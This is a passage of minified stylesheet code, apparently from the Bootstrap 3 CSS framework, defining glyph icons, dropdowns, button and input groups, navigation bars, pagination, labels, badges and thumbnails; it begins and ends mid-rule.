ntent:"\e102"}.glyphicon-leaf:before{content:"\e103"}.glyphicon-eye-open:before{content:"\e105"}.glyphicon-eye-close:before{content:"\e106"}.glyphicon-warning-sign:before{content:"\e107"}.glyphicon-plane:before{content:"\e108"}.glyphicon-random:before{content:"\e110"}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\e117"}.glyphicon-folder-open:before{content:"\e118"}.glyphicon-resize-vertical:before{content:"\e119"}.glyphicon-resize-horizontal:before{content:"\e120"}.glyphicon-hdd:before{content:"\e121"}.glyphicon-bullhorn:before{content:"\e122"}.glyphicon-certificate:before{content:"\e124"}.glyphicon-thumbs-up:before{content:"\e125"}.glyphicon-thumbs-down:before{content:"\e126"}.glyphicon-hand-right:before{content:"\e127"}.glyphicon-hand-left:before{content:"\e128"}.glyphicon-hand-up:before{content:"\e129"}.glyphicon-hand-down:before{content:"\e130"}.glyphicon-circle-arrow-right:before{content:"\e131"}.glyphicon-circle-arrow-left:before{content:"\e132"}.glyphicon-circle-arrow-up:before{content:"\e133"}.glyphicon-circle-arrow-down:before{content:"\e134"}.glyphicon-globe:before{content:"\e135"}.glyphicon-tasks:before{content:"\e137"}.glyphicon-filter:before{content:"\e138"}.glyphicon-fullscreen:before{content:"\e140"}.glyphicon-dashboard:before{content:"\e141"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e149"}.glyphicon-sort:before{content:"\e150"}.glyphicon-sort-by-alphabet:before{content:"\e151"}.glyphicon-sort-by-alphabet-alt:before{content:"\e152"}.glyphicon-sort-by-order:before{content:"\e153"}.glyphicon-sort-by-order-alt:before{content:"\e154"}.glyphicon-sort-by-attributes:before{content:"\e155"}.glyphicon-sort-by-attributes-alt:before{content:"\e156"}.glyphicon-unchecked:before{content:"\e157"}.glyphicon-expand:before{content:"\e158"}.glyphicon-collapse-down:before{content:"\e159"}.glyphicon-collapse-up:before{content:"\e160"}.glyphicon-log-in:before{content:"\e161"}.glyphicon-flash:before{content:"\e162"}.glyphicon-log-out:before{content:"\e163"}.glyphicon-new-window:before{content:"\e164"}.glyphicon-record:before{content:"\e165"}.glyphicon-save:before{content:"\e166"}.glyphicon-open:before{content:"\e167"}.glyphicon-saved:before{content:"\e168"}.glyphicon-import:before{content:"\e169"}.glyphicon-export:before{content:"\e170"}.glyphicon-send:before{content:"\e171"}.glyphicon-floppy-disk:before{content:"\e172"}.glyphicon-floppy-saved:before{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphicon-cutlery:before{content:"\e179"}.glyphicon-header:before{content:"\e180"}.glyphicon-compressed:before{content:"\e181"}.glyphicon-earphone:before{content:"\e182"}.glyphicon-phone-alt:before{content:"\e183"}.glyphicon-tower:before{content:"\e184"}.glyphicon-stats:before{content:"\e185"}.glyphicon-sd-video:before{content:"\e186"}.glyphicon-hd-video:before{content:"\e187"}.glyphicon-subtitles:before{content:"\e188"}.glyphicon-sound-stereo:before{content:"\e189"}.glyphicon-sound-dolby:before{content:"\e190"}.glyphicon-sound-5-1:before{content:"\e191"}.glyphicon-sound-6-1:before{content:"\e192"}.glyphicon-sound-7-1:before{content:"\e193"}.glyphicon-copyright-mark:before{content:"\e194"}.glyphicon-registration-mark:before{content:"\e195"}.glyphicon-cloud-download:before{content:"\e197"}.glyphicon-cloud-upload:before{content:"\e198"}.glyphicon-tree-conifer:before{content:"\e199"}.glyphicon-tree-deciduous:before{content:"\e200"}.glyphicon-briefcase:before{content:"\1f4bc"}.glyphicon-calendar:before{content:"\1f4c5"}.glyphicon-pushpin:before{content:"\1f4cc"}.glyphicon-paperclip:before{content:"\1f4ce"}.glyphicon-camera:before{content:"\1f4f7"}.glyphicon-lock:before{content:"\1f512"}.glyphicon-bell:before{content:"\1f514"}.glyphicon-bookmark:before{content:"\1f516"}.glyphicon-fire:before{content:"\1f525"}.glyphicon-wrench:before{content:"\1f527"}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px solid #000;border-right:4px solid transparent;border-bottom:0 dotted;border-left:4px solid transparent;content:""}.dropdown{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;list-style:none;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,0.175);box-shadow:0 6px 12px rgba(0,0,0,0.175);background-clip:padding-box}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:normal;line-height:1.428571429;color:#333;white-space:nowrap}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{color:#fff;text-decoration:none;background-color:#428bca}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{color:#fff;text-decoration:none;background-color:#428bca;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{color:#999}.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.428571429;color:#999}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{border-top:0 dotted;border-bottom:4px solid #000;content:""}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:1px}@media(min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}}.btn-default .caret{border-top-color:#333}.btn-primary .caret,.btn-success .caret,.btn-warning .caret,.btn-danger .caret,.btn-info .caret{border-top-color:#fff}.dropup .btn-default .caret{border-bottom-color:#333}.dropup .btn-primary .caret,.dropup .btn-success .caret,.dropup .btn-warning .caret,.dropup .btn-danger .caret,.dropup .btn-info .caret{border-bottom-color:#fff}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group>.btn,.btn-group-vertical>.btn{position:relative;float:left}.btn-group>.btn:hover,.btn-group-vertical>.btn:hover,.btn-group>.btn:focus,.btn-group-vertical>.btn:focus,.btn-group>.btn:active,.btn-group-vertical>.btn:active,.btn-group>.btn.active,.btn-group-vertical>.btn.active{z-index:2}.btn-group>.btn:focus,.btn-group-vertical>.btn:focus{outline:0}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar .btn-group{float:left}.btn-toolbar>.btn+.btn,.btn-toolbar>.btn-group+.btn,.btn-toolbar>.btn+.btn-group,.btn-toolbar>.btn-group+.btn-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child>.btn:last-child,.btn-group>.btn-group:first-child>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child>.btn:first-child{border-bottom-left-radius:0;border-top-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group-xs>.btn{padding:5px 10px;padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-sm>.btn{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-lg>.btn{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child>.btn:last-child,.btn-group-vertical>.btn-group:first-child>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child>.btn:first-child{border-top-right-radius:0;border-top-left-radius:0}.btn-group-justified{display:table;width:100%;border-collapse:separate;table-layout:fixed}.btn-group-justified .btn{display:table-cell;float:none;width:1%}[data-toggle="buttons"]>.btn>input[type="radio"],[data-toggle="buttons"]>.btn>input[type="checkbox"]{display:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group.col{float:none;padding-right:0;padding-left:0}.input-group .form-control{width:100%;margin-bottom:0}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:45px;line-height:45px}textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-addon,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:normal;line-height:1;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type="radio"],.input-group-addon input[type="checkbox"]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:last-child>.btn,.input-group-btn:last-child>.dropdown-toggle,.input-group-btn:first-child>.btn:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-4px}.input-group-btn>.btn:hover,.input-group-btn>.btn:active{z-index:2}.nav{padding-left:0;margin-bottom:0;list-style:none}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav>li{position:relative;display:block}.nav>li>a{position:relative;display:block;padding:10px 15px}.nav>li>a:hover,.nav>li>a:focus{text-decoration:none;background-color:#eee}.nav>li.disabled>a{color:#999}.nav>li.disabled>a:hover,.nav>li.disabled>a:focus{color:#999;text-decoration:none;cursor:not-allowed;background-color:transparent}.nav .open>a,.nav .open>a:hover,.nav .open>a:focus{background-color:#eee;border-color:#428bca}.nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.nav>li>a>img{max-width:none}.nav-tabs{border-bottom:1px solid #ddd}.nav-tabs>li{float:left;margin-bottom:-1px}.nav-tabs>li>a{margin-right:2px;line-height:1.428571429;border:1px solid transparent;border-radius:4px 4px 0 0}.nav-tabs>li>a:hover{border-color:#eee #eee #ddd}.nav-tabs>li.active>a,.nav-tabs>li.active>a:hover,.nav-tabs>li.active>a:focus{color:#555;cursor:default;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent}.nav-tabs.nav-justified{width:100%;border-bottom:0}.nav-tabs.nav-justified>li{float:none}.nav-tabs.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}}.nav-tabs.nav-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs.nav-justified>.active>a{border-bottom-color:#fff}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:5px}.nav-pills>li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:hover,.nav-pills>li.active>a:focus{color:#fff;background-color:#428bca}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified>li{float:none}.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-justified>li{display:table-cell;width:1%}}.nav-tabs-justified{border-bottom:0}.nav-tabs-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs-justified>.active>a{border-bottom-color:#fff}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tab-content>.tab-pane,.pill-content>.pill-pane{display:none}.tab-content>.active,.pill-content>.active{display:block}.nav .caret{border-top-color:#428bca;border-bottom-color:#428bca}.nav a:hover .caret{border-top-color:#2a6496;border-bottom-color:#2a6496}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-right-radius:0;border-top-left-radius:0}.navbar{position:relative;z-index:1000;min-height:50px;margin-bottom:20px;border:1px solid transparent}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}@media(min-width:768px){.navbar{border-radius:4px}}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}@media(min-width:768px){.navbar-header{float:left}}.navbar-collapse{max-height:340px;padding-right:15px;padding-left:15px;overflow-x:visible;border-top:1px solid transparent;box-shadow:inset 0 1px 0 rgba(255,255,255,0.1);-webkit-overflow-scrolling:touch}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse.in{overflow-y:auto}@media(min-width:768px){.navbar-collapse{width:auto;border-top:0;box-shadow:none}.navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}.navbar-collapse.in{overflow-y:visible}.navbar-collapse .navbar-nav.navbar-left:first-child{margin-left:-15px}.navbar-collapse .navbar-nav.navbar-right:last-child{margin-right:-15px}.navbar-collapse .navbar-text:last-child{margin-right:0}}.container>.navbar-header,.container>.navbar-collapse{margin-right:-15px;margin-left:-15px}@media(min-width:768px){.container>.navbar-header,.container>.navbar-collapse{margin-right:0;margin-left:0}}.navbar-static-top{border-width:0 0 1px}@media(min-width:768px){.navbar-static-top{border-radius:0}}.navbar-fixed-top,.navbar-fixed-bottom{position:fixed;right:0;left:0;border-width:0 0 1px}@media(min-width:768px){.navbar-fixed-top,.navbar-fixed-bottom{border-radius:0}}.navbar-fixed-top{top:0;z-index:1030}.navbar-fixed-bottom{bottom:0;margin-bottom:0}.navbar-brand{float:left;padding:15px 15px;font-size:18px;line-height:20px}.navbar-brand:hover,.navbar-brand:focus{text-decoration:none}@media(min-width:768px){.navbar>.container .navbar-brand{margin-left:-15px}}.navbar-toggle{position:relative;float:right;padding:9px 10px;margin-top:8px;margin-right:15px;margin-bottom:8px;background-color:transparent;border:1px solid transparent;border-radius:4px}.navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}.navbar-toggle .icon-bar+.icon-bar{margin-top:4px}@media(min-width:768px){.navbar-toggle{display:none}}.navbar-nav{margin:7.5px -15px}.navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}@media(max-width:767px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;box-shadow:none}.navbar-nav .open .dropdown-menu>li>a,.navbar-nav .open .dropdown-menu .dropdown-header{padding:5px 15px 5px 25px}.navbar-nav .open .dropdown-menu>li>a{line-height:20px}.navbar-nav .open .dropdown-menu>li>a:hover,.navbar-nav .open .dropdown-menu>li>a:focus{background-image:none}}@media(min-width:768px){.navbar-nav{float:left;margin:0}.navbar-nav>li{float:left}.navbar-nav>li>a{padding-top:15px;padding-bottom:15px}}@media(min-width:768px){.navbar-left{float:left!important}.navbar-right{float:right!important}}.navbar-form{padding:10px 15px;margin-top:8px;margin-right:-15px;margin-bottom:8px;margin-left:-15px;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1);box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1)}@media(min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.navbar-form .form-control{display:inline-block}.navbar-form .radio,.navbar-form .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.navbar-form .radio input[type="radio"],.navbar-form .checkbox input[type="checkbox"]{float:none;margin-left:0}}@media(max-width:767px){.navbar-form .form-group{margin-bottom:5px}}@media(min-width:768px){.navbar-form{width:auto;padding-top:0;padding-bottom:0;margin-right:0;margin-left:0;border:0;-webkit-box-shadow:none;box-shadow:none}}.navbar-nav>li>.dropdown-menu{margin-top:0;border-top-right-radius:0;border-top-left-radius:0}.navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{border-bottom-right-radius:0;border-bottom-left-radius:0}.navbar-nav.pull-right>li>.dropdown-menu,.navbar-nav>li>.dropdown-menu.pull-right{right:0;left:auto}.navbar-btn{margin-top:8px;margin-bottom:8px}.navbar-text{float:left;margin-top:15px;margin-bottom:15px}@media(min-width:768px){.navbar-text{margin-right:15px;margin-left:15px}}.navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}.navbar-default .navbar-brand{color:#777}.navbar-default .navbar-brand:hover,.navbar-default .navbar-brand:focus{color:#5e5e5e;background-color:transparent}.navbar-default .navbar-text{color:#777}.navbar-default .navbar-nav>li>a{color:#777}.navbar-default .navbar-nav>li>a:hover,.navbar-default .navbar-nav>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:hover,.navbar-default .navbar-nav>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:hover,.navbar-default .navbar-nav>.disabled>a:focus{color:#ccc;background-color:transparent}.navbar-default .navbar-toggle{border-color:#ddd}.navbar-default .navbar-toggle:hover,.navbar-default .navbar-toggle:focus{background-color:#ddd}.navbar-default .navbar-toggle .icon-bar{background-color:#ccc}.navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e6e6e6}.navbar-default .navbar-nav>.dropdown>a:hover .caret,.navbar-default .navbar-nav>.dropdown>a:focus .caret{border-top-color:#333;border-bottom-color:#333}.navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:hover,.navbar-default .navbar-nav>.open>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.open>a .caret,.navbar-default .navbar-nav>.open>a:hover .caret,.navbar-default .navbar-nav>.open>a:focus .caret{border-top-color:#555;border-bottom-color:#555}.navbar-default .navbar-nav>.dropdown>a .caret{border-top-color:#777;border-bottom-color:#777}@media(max-width:767px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#ccc;background-color:transparent}}.navbar-default .navbar-link{color:#777}.navbar-default .navbar-link:hover{color:#333}.navbar-inverse{background-color:#222;border-color:#080808}.navbar-inverse .navbar-brand{color:#999}.navbar-inverse .navbar-brand:hover,.navbar-inverse .navbar-brand:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-text{color:#999}.navbar-inverse .navbar-nav>li>a{color:#999}.navbar-inverse .navbar-nav>li>a:hover,.navbar-inverse .navbar-nav>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:hover,.navbar-inverse .navbar-nav>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:hover,.navbar-inverse .navbar-nav>.disabled>a:focus{color:#444;background-color:transparent}.navbar-inverse .navbar-toggle{border-color:#333}.navbar-inverse .navbar-toggle:hover,.navbar-inverse .navbar-toggle:focus{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#101010}.navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:hover,.navbar-inverse .navbar-nav>.open>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.dropdown>a:hover .caret{border-top-color:#fff;border-bottom-color:#fff}.navbar-inverse .navbar-nav>.dropdown>a .caret{border-top-color:#999;border-bottom-color:#999}.navbar-inverse .navbar-nav>.open>a .caret,.navbar-inverse .navbar-nav>.open>a:hover .caret,.navbar-inverse .navbar-nav>.open>a:focus .caret{border-top-color:#fff;border-bottom-color:#fff}@media(max-width:767px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#999}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#444;background-color:transparent}}.navbar-inverse .navbar-link{color:#999}.navbar-inverse .navbar-link:hover{color:#fff}.breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}.breadcrumb>li{display:inline-block}.breadcrumb>li+li:before{padding:0 5px;color:#ccc;content:"/\00a0"}.breadcrumb>.active{color:#999}.pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}.pagination>li{display:inline}.pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;margin-left:-1px;line-height:1.428571429;text-decoration:none;background-color:#fff;border:1px solid #ddd}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.pagination>li:last-child>a,.pagination>li:last-child>span{border-top-right-radius:4px;border-bottom-right-radius:4px}.pagination>li>a:hover,.pagination>li>span:hover,.pagination>li>a:focus,.pagination>li>span:focus{background-color:#eee}.pagination>.active>a,.pagination>.active>span,.pagination>.active>a:hover,.pagination>.active>span:hover,.pagination>.active>a:focus,.pagination>.active>span:focus{z-index:2;color:#fff;cursor:default;background-color:#428bca;border-color:#428bca}.pagination>.disabled>span,.pagination>.disabled>a,.pagination>.disabled>a:hover,.pagination>.disabled>a:focus{color:#999;cursor:not-allowed;background-color:#fff;border-color:#ddd}.pagination-lg>li>a,.pagination-lg>li>span{padding:10px 16px;font-size:18px}.pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-bottom-left-radius:6px;border-top-left-radius:6px}.pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-top-right-radius:6px;border-bottom-right-radius:6px}.pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px}.pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-bottom-left-radius:3px;border-top-left-radius:3px}.pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-top-right-radius:3px;border-bottom-right-radius:3px}.pager{padding-left:0;margin:20px 0;text-align:center;list-style:none}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager li{display:inline}.pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}.pager li>a:hover,.pager li>a:focus{text-decoration:none;background-color:#eee}.pager .next>a,.pager .next>span{float:right}.pager .previous>a,.pager .previous>span{float:left}.pager .disabled>a,.pager .disabled>a:hover,.pager .disabled>a:focus,.pager .disabled>span{color:#999;cursor:not-allowed;background-color:#fff}.label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}.label[href]:hover,.label[href]:focus{color:#fff;text-decoration:none;cursor:pointer}.label:empty{display:none}.label-default{background-color:#999}.label-default[href]:hover,.label-default[href]:focus{background-color:#808080}.label-primary{background-color:#428bca}.label-primary[href]:hover,.label-primary[href]:focus{background-color:#3071a9}.label-success{background-color:#5cb85c}.label-success[href]:hover,.label-success[href]:focus{background-color:#449d44}.label-info{background-color:#5bc0de}.label-info[href]:hover,.label-info[href]:focus{background-color:#31b0d5}.label-warning{background-color:#f0ad4e}.label-warning[href]:hover,.label-warning[href]:focus{background-color:#ec971f}.label-danger{background-color:#d9534f}.label-danger[href]:hover,.label-danger[href]:focus{background-color:#c9302c}.badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;background-color:#999;border-radius:10px}.badge:empty{display:none}a.badge:hover,a.badge:focus{color:#fff;text-decoration:none;cursor:pointer}.btn .badge{position:relative;top:-1px}a.list-group-item.active>.badge,.nav-pills>.active>a>.badge{color:#428bca;background-color:#fff}.nav-pills>li>a>.badge{margin-left:3px}.jumbotron{padding:30px;margin-bottom:30px;font-size:21px;font-weight:200;line-height:2.1428571435;color:inherit;background-color:#eee}.jumbotron h1{line-height:1;color:inherit}.jumbotron p{line-height:1.4}.container .jumbotron{border-radius:6px}@media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}.container .jumbotron{padding-right:60px;padding-left:60px}.jumbotron h1{font-size:63px}}.thumbnail{display:inline-block;display:block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.thumbnail>img{display:block;height:auto;max-width:100%}a.thumbnail:hover,a.thumbnail:focus{border-color:#428bca}.thumbnail>img{margin-right:auto;margin-left:auto}.thumbnail .caption{padding:9px;color:#333}.alert{padding:15px;margin-bottom:20px;border:1px solid 